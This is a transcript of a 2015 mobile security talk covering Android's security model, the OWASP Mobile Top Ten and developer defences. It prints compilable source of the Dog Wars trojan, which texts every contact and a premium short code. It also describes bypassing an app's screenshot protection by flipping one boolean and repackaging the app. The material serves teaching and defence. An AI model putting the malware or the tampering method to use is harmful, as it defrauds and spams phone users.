Date posted: 21-May-2018
ISACA – Mobile Computing
Transcript

ISACA – Mobile Computing

Welcome – Welcome to my presentation

ISACA – Leeds – 18th November 2015

Please save all questions until the end of the presentation

Let's start!

Agenda

1. About me – Who am I?
2. Introduction to Mobile – Why mobile
3. Mobile Security Challenges – From a business point-of-view
4. OWASP – Mobile Security Project
5. Common Vulnerabilities – Real examples, including Malware
6. Fixes – Develop secure code
7. The future of mobile – Where I see the future going

End of presentation – Thank you for your attention

About me – Short info on what I do

About Me – Who am I?

Andrew Pannell – Andrew/Andy/Andi

Ethical Hacking for Computer Security BSc – 25,000 word dissertation on mobile [in]security

OWASP Mobile Security Project – Member, Contributor, Android SME

Penetration Tester – Working for Pentest Limited. Based in the London office

CREST ICS Technical Assurance – Industrial Control Systems/SCADA

www.pentest.co.uk

About Us – Who are Pentest?

Pentest Limited

Established in 2001

CREST Member company (Council of Registered Ethical Security Testers)

Application security specialists

Research

About You – Who are my audience?

Developers?

Security Professionals?

Apple?

Techies?

Android?

Intro to Mobile – Why mobile?

Phones Timeline – How phones have developed

1875 – A.G. Bell invents the telephone

1997 – Nokia 6110: three games, calculator, works as a pager

1999 – Blackberry 850: first device released under the Blackberry brand

Phones Timeline – How phones have developed

2000 – Nokia 3310: the one your mates had at school. Indestructible

2001 – Symbian S80: Nokia's OS. Runs Java files.

2004 – First mobile virus, "Cabir": spread via Bluetooth; harmless, displays "Caribe" on the screen

Phones Timeline – How phones have developed

2006 – Symbian S60 & Nokia N95: mandatory code signing

2008 – Apple iPhone and Android: launch of smartphones with the ability to purchase apps

Present

Mobile Introduction – Big money in mobile

Mobile Statistics

$77 billion per year – revenue of mobile applications worldwide

100 apps installed – average number of applications installed per user mobile device

75% fail basic security – according to Gartner, even basic security fails to be implemented on mobile apps

56 million items of data – unencrypted, unsecured, unprotected private user data

Mobile Security – On average 9 vulnerabilities per application

Low (28%) – No direct threat; more a risk, and does not cause damage by itself, but may be leveraged with other vulnerabilities to launch further attacks.

Medium (34%) – Imposes some effect/damage on the application. Can assist an attacker in launching further attacks.

High (25%) – Potential to directly compromise CIA (confidentiality, integrity, availability); likelihood is not high. Possible damage is high but not a total disaster.

Critical (13%) – Major security risk, with a direct exploit. Ability to cause major damage to the application/company. Likelihood is high.

Source: https://www.checkmarx.com/2015/11/05/the-state-of-mobile-app-security/

Android Introduction – Why Android?

1.5 million daily activations with over 1 billion active users

Over 4,000 Android devices

83% of worldwide market share

Android Introduction – More about Android

Overview

Part compiled apps (Dalvik bytecode, which is readily decompiled)

Internal storage and SD card

SQLite database

Activities/Intents/Services/Broadcasts/Content providers

Android Security – Android Security Model

Application isolation

Sandboxing – The Android Application Sandbox, which isolates your app's data and code execution from other apps.

Permissions model – User-granted permissions restrict access to system features and user data. Application-defined permissions control access to application data on a per-app basis.

Android Security – Android Security Model – Sandboxing (image slide; no text in transcript)

Android Security – Android Security Model – Permissions (image slide; no text in transcript)

Challenges – To mobile security

Business Challenges – Difficulties with mobile

The emergence of mobile as a new technology means new developers, straight out of university, making the same old web security mistakes.

Rush to market, to get there before competitors.

BYOD means that hostile mobile devices are now connecting to the enterprise environment.

"Mobile devices tend to be misplaced, lost or even stolen"

Business Challenges – News (five image slides of news stories; no text in transcript)

OWASP – Mobile Security Project

OWASP Mobile – Open Web Application Security Project

The OWASP Mobile Security Project is a centralized resource intended to give developers and security teams the resources they need to build and maintain secure mobile applications. Through the project, our goal is to classify mobile security risks and provide developmental controls to reduce their impact or likelihood of exploitation.

Our primary focus is at the application layer. While we take into consideration the underlying mobile platform and carrier inherent risks when threat modelling and building controls, we are targeting the areas that the average developer can make a difference. Additionally, we focus not only on the mobile applications deployed to end user devices, but also on the broader server-side infrastructure which the mobile apps communicate with. We focus heavily on the integration between the mobile application, remote authentication services, and cloud platform-specific features.

Source: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project

OWASP – Mobile Top 10 2015 (DRAFT)

Improper Platform Usage

Insecure Data Storage

Insecure Communications

Insecure Authentication

Insufficient Crypto

Insecure Authorisation

Client Code Quality Issues

Code Tampering

Reverse Engineering

Extraneous Functionality

Note: these are in no particular order

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Improper Platform Usage

Violation of development guidelines for security

Unintentional misuse

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Insecure Data Storage

Including unintended data leakage

SQL databases, log files, XML manifest, SD card, cookies, the cloud

Internal processes, caches

Analytics

Leaving user data unprotected in your app may allow malicious applications to access it

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Insecure Communications

Weak SSL versions and ciphers

Weak handshake

Clear-text communications

Man-in-the-middle

Jeopardises the confidentiality of data between your app and the endpoint via MiTM attacks

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Insecure Authentication

Bad/weak session management

Predictable identifiers

Session fixation

Failing to log out properly (e.g. only client-side)

Failing to identify a user at all

Risk of exposing data to unidentified users (e.g. anonymous users) invoking web services

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Insufficient Cryptography

Relates to crypto attempted, but poorly

Poor key selection (lack of randomness)

Roll your own crypto?!

User data is likely to be exposed: offline brute force, replay attacks

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Insecure Authorisation

Client-based authorisation decisions

Permissions once logged in

Granting unauthorised users access to invoke or receive services

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Client Code Quality

Ensure secure coding practices during the life cycle

Code-level implementation problems on the mobile client

Buffer overflow, format string vulnerabilities

Exploiting business logic

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Code Tampering

Binary patching

Changes to the application package

Malware

Subvert/short-circuit licensing, clone the application for malicious purposes

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Reverse Engineering

Not always a problem (open source)

Can reveal hidden methods and functionality

May lead to code tampering

Bypass logic

Bypass security controls and business logic, facilitating other attacks. Business risk: loss of revenue, brand damage, phishing

OWASP Mobile – Mobile Top Ten 2015 (BETA)

Extraneous functionality

Backdoor functionality

Development code left in

Exposing extra functionality left in for development

Common Vulns – Real life examples

Case Study – Dog O War

Mobile Malware – released in August 2011

Modified legitimate app – Dog Wars by Kage Games

Read contacts

Sent texts to contacts

Sent premium rate messages

PETA distanced themselves

Case Study – Dog Wars – Android Manifest

<manifest package="kagegames.apps.DWBeta">
  <uses-permission android:name="android.permission.VIBRATE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <meta-data android:name="ADMOB_PUBLISHER_ID" android:value="NOTKAGAEGAMES"/>

The tell is the permission set: a game has no need for SEND_SMS, WRITE_SMS, READ_CONTACTS or RECEIVE_BOOT_COMPLETED, and the AdMob publisher ID no longer belongs to the original developer.

Case Study – Dog Wars – Code

package com.dogbite;

import android.app.Service;
import android.content.Intent;
import android.database.Cursor;
import android.os.IBinder;
import android.provider.ContactsContract;
import android.telephony.SmsManager;

// Decompiled from the trojanised Dog Wars APK, tidied so that it compiles.
// Shown for analysis only: it walks the contact list, texts every entry,
// then texts "text" to the short code 73822. Do not run.
public class Rabies extends Service {

    public void onStart(Intent paramIntent, int paramInt) {
        super.onStart(paramIntent, paramInt);
        Cursor localObject = getContentResolver().query(
                ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
        SmsManager localSmsManager = SmsManager.getDefault();
        if (localObject.getCount() > 0) {
            while (true) {
                if (!localObject.moveToNext()) {
                    // Contacts exhausted: subscribe the victim to the short code.
                    localSmsManager.sendTextMessage("73822", null, "text", null, null);
                    break;
                }
                // "data1" is read straight from the Contacts cursor, as the decompiler output had it.
                localSmsManager.sendTextMessage(
                        localObject.getString(localObject.getColumnIndex("data1")),
                        null,
                        "I take pleasure in hurting small animals, just thought you should know that",
                        null, null);
            }
        }
    }

    public IBinder onBind(Intent intent) {
        return null;
    }
}

Code Example – Streaming App – 1 variable protection

package com.store.app.module.util;

import android.view.Window;
import com.store.app.util.Restriction;
import com.store.app.util.ScreenshotRestriction;

public class RestrictionsModule {
    // The whole screenshot restriction hinges on this one boolean literal.
    // Flip it to false in the decompiled code, repackage and re-sign, and the
    // protection is gone.
    public static Restriction<Window> screenshotRestrictions() {
        return new ScreenshotRestriction(true);
    }
}

Fixes – Develop secure code

Developer Fixes – How to code securely

1. Code tampering – Slow down reverse engineering by obfuscating code. Check that the APK's signing certificate matches the expected one, so that modified code is not allowed to run.

2. Insecure data storage – Encrypt application data files. Do not store them on the SD card (if possible). Be careful in your choice of analytics.

3. Insecure authorisation and authentication – Assume the device is hostile; validate on the server side.

Developer Fixes – How to code securely

4. Rooted devices – Can you allow a rooted device to run your application? If so, consider presenting a warning to the user regarding the security of their data.
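Fixes 1 and 4 are both runtime checks inside the app. The following is an added example for this transcript, not code from the slides or from Pentest Limited: a signing-certificate check that refuses to proceed unless the package is signed by exactly the expected certificate, and a root heuristic based on AOSP test keys and well-known su paths. The expected certificate digest is a placeholder to be replaced with your own release certificate's SHA-256; the su path list and the class name are assumptions for the example.

```java
import android.content.Context;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.os.Build;
import java.io.File;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.List;

/** Added example (assumed class name): APK signature check (fix 1) and root indicators (fix 4). */
public final class IntegrityChecks {
    // Placeholder, not a real value: SHA-256 of the release signing certificate as
    // lower-case hex (obtain yours with `keytool -printcert -jarfile app-release.apk`).
    private static final String EXPECTED_CERT_SHA256 =
            "0000000000000000000000000000000000000000000000000000000000000000";

    // Assumed list of common su locations; root managers differ, so treat as a heuristic.
    private static final List<String> SU_PATHS = Arrays.asList(
            "/system/bin/su", "/system/xbin/su", "/sbin/su", "/su/bin/su", "/data/local/bin/su");

    /** True only if this package is signed by exactly the expected certificate. */
    public static boolean signatureMatches(Context ctx) {
        try {
            PackageInfo info = ctx.getPackageManager()
                    .getPackageInfo(ctx.getPackageName(), PackageManager.GET_SIGNATURES);
            // A repackaged APK cannot be signed with the original private key, so the
            // attacker's own certificate turns up here. Reject multiple signers as well.
            if (info.signatures == null || info.signatures.length != 1) return false;
            byte[] actual = MessageDigest.getInstance("SHA-256")
                    .digest(info.signatures[0].toByteArray());
            return MessageDigest.isEqual(hexToBytes(EXPECTED_CERT_SHA256), actual);
        } catch (PackageManager.NameNotFoundException | NoSuchAlgorithmException e) {
            return false;  // fail closed
        }
    }

    /** Heuristic root detection: build signed with AOSP test keys, or a su binary present. */
    public static boolean looksRooted() {
        if (Build.TAGS != null && Build.TAGS.contains("test-keys")) return true;
        for (String path : SU_PATHS) {
            if (new File(path).exists()) return true;
        }
        return false;
    }

    private static byte[] hexToBytes(String hex) {
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }
}
```

GET_SIGNATURES is deprecated from API 28, where GET_SIGNING_CERTIFICATES and PackageInfo.signingInfo replace it; the digest comparison is the same. The caveat is the one the streaming-app example makes: both checks run in a process the attacker controls and can be patched out exactly like that single `true`, so they buy friction, not assurance. Fix 3 still applies: anything that matters is validated on the server.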

The future – What I see anyway

Mobile Future – Android Wear: works in conjunction with the mobile device. Notifications, interactions, fitness and health.

Mobile Future – Android TV: smart TV, Android UI, voice commands, screen casting, internet connected.

Mobile Future – Android Auto: extends the functionality of the phone to the car; client-server with the phone; pulls information from sensors.

Contact – My contact details

Contact Info

Any questions? Comments?

Thank You

[email protected]

www.pentest.co.uk

+44 (0)7530 668 399

